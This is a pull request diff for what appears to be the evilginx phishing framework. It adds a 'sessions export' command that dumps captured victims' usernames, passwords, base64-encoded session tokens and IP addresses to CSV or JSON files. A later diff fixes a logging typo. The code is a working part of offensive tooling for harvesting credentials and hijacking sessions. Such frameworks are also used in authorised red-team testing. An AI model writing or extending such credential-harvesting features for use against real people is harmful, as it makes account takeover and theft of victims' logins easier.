### PR TITLE
Added 'sessions export <json|csv> <file>' method

### DIFF
--- a/core/terminal.go
+++ b/core/terminal.go
@@ -2,6 +2,9 @@ package core
 
 import (
 	"encoding/json"
+	"encoding/csv"
+	"encoding/base64"
+	"os"
 	"fmt"
 	"io"
 	"net/url"
@@ -347,6 +350,74 @@ func (t *Terminal) handleSessions(args []string) error {
 				return nil
 			}
 		}
+	} else if pn == 3 {
+		switch args[0] {
+		case "export":
+			outFile, err := os.Create(args[2])
+			if err != nil {
+				return err
+			}
+			defer outFile.Close()
+			sessions, err := t.db.ListSessions()
+			if err != nil {
+				return err
+			}
+			if len(sessions) == 0 {
+				log.Info("no saved sessions found")
+				return nil
+			}
+			switch args[1] {
+			case "csv":
+				wr := csv.NewWriter(outFile)
+				wr.Write([]string{"Id", "Phishlet", "Username", "Password", "Tokens (base64 encoded)", "Remote IP", "Time"})
+				for _, s := range sessions {
+					pl, err := t.cfg.GetPhishlet(s.Phishlet)
+					if err != nil {
+						log.Error("%v", err)
+						break
+					}
+					base64tokens := base64.StdEncoding.EncodeToString([]byte(t.tokensToJSON(pl, s.Tokens)))
+					wr.Write([]string{strconv.Itoa(s.Id), s.Phishlet, s.Username, s.Password, base64tokens, s.RemoteAddr, time.Unix(s.UpdateTime, 0).Format("2006-01-02 15:04")})
+				}
+				wr.Flush()
+				log.info("exported sessions to csv: %s", outFile.Name())
+			case "json":
+				type ExportedSession struct {
+					Id string `json:"id"`
+					Phishlet string `json:"phishlet"`
+					Username string `json:"username"`
+					Password string `json:"password"`
+					Tokens string `json:"tokens_base64_encoded"`
+					RemoteAddr string `json:"remote_ip"`
+					Time string `json:"time"`
+				}
+				var exported []*ExportedSession
+				for _, s := range sessions {
+					pl, err := t.cfg.GetPhishlet(s.Phishlet)
+					if err != nil {
+						log.Error("%v", err)
+						break
+					}
+					es := &ExportedSession{
+						Id: strconv.Itoa(s.Id),
+						Phishlet: s.Phishlet,
+						Username: s.Username,
+						Password: s.Password,
+						Tokens: base64.StdEncoding.EncodeToString([]byte(t.tokensToJSON(pl, s.Tokens))),
+						RemoteAddr: s.RemoteAddr,
+						Time: time.Unix(s.UpdateTime, 0).Format("2006-01-02 15:04"),
+					}
+					exported = append(exported, es)
+				}
+				json, _ := json.Marshal(exported)
+				_, err := outFile.Write(json)
+				if err != nil {
+					return err
+				}
+				log.Info("exported sessions to json: %s", outFile.Name())
+			}
+		}
+		return nil
 	}
 	return fmt.Errorf("invalid syntax: %s", args)
 }
@@ -745,11 +816,13 @@ func (t *Terminal) createHelp() {
 	h.AddSubCommand("phishlets", []string{"get-hosts"}, "get-hosts <phishlet>", "generates entries for hosts file in order to use localhost for testing")
 
 	h.AddCommand("sessions", "general", "manage sessions and captured tokens with credentials", "Shows all captured credentials and authentication tokens. Allows to view full history of visits and delete logged sessions.", LAYER_TOP,
-		readline.PcItem("sessions", readline.PcItem("delete", readline.PcItem("all"))))
+		readline.PcItem("sessions", readline.PcItem("delete", readline.PcItem("all")), readline.PcItem("export", readline.PcItem("csv"), readline.PcItem("json"))))
 	h.AddSubCommand("sessions", nil, "", "show history of all logged visits and captured credentials")
 	h.AddSubCommand("sessions", nil, "<id>", "show session details, including captured authentication tokens, if available")
 	h.AddSubCommand("sessions", []string{"delete"}, "delete <id>", "delete logged session with <id> (ranges with separators are allowed e.g. 1-7,10-12,15-25)")
 	h.AddSubCommand("sessions", []string{"delete", "all"}, "delete all", "delete all logged sessions")
+	h.AddSubCommand("sessions", []string{"export", "csv"}, "export csv <output-file>", "export sessions in csv format to <output-file>")
+	h.AddSubCommand("sessions", []string{"export", "json"}, "export json <output-file>", "export sessions in json format to <output-file>")
 
 	h.AddCommand("lures", "general", "manage lures for generation of phishing urls", "Shows all create lures and allows to edit or delete them.", LAYER_TOP,
 		readline.PcItem("lures", readline.PcItem("create", readline.PcItemDynamic(t.phishletPrefixCompleter)), readline.PcItem("get-url"),

--- a/core/terminal.go
+++ b/core/terminal.go
@@ -380,7 +380,7 @@ func (t *Terminal) handleSessions(args []string) error {
 					wr.Write([]string{strconv.Itoa(s.Id), s.Phishlet, s.Username, s.Password, base64tokens, s.RemoteAddr, time.Unix(s.UpdateTime, 0).Format("2006-01-02 15:04")})
 				}
 				wr.Flush()
-				log.info("exported sessions to csv: %s", outFile.Name())
+				log.Info("exported sessions to csv: %s", outFile.Name())
 			case "json":
 				type ExportedSession struct {
 					Id string `json:"id"`


### PR DESCRIPTION
Added method to export sessions directly to csv or json files. The
tokens are exported as base64 encoded to simplify exporting and reuse
existing functionality.